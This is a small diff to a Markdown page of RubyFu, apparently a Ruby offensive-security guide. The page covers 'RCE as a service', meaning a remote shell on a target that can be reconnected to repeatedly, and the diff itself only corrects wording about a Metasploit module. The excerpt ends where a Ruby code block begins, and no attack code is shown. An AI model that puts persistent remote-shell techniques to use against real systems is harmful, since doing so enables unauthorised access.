rubyfu/RubyFu/module_0x2__system_kungfu/rce_as_a_service.md

 As you can see, even you loose the session you can connect again and again; it's a service, remember?

-Note: For using metasploit module *only*, you don't need even the RShell class.
+Note: For using a Metasploit module *only*, you don't need even the RShell class.
 You just need the following on the target side.

 ```ruby
 #!/usr/bin/env ruby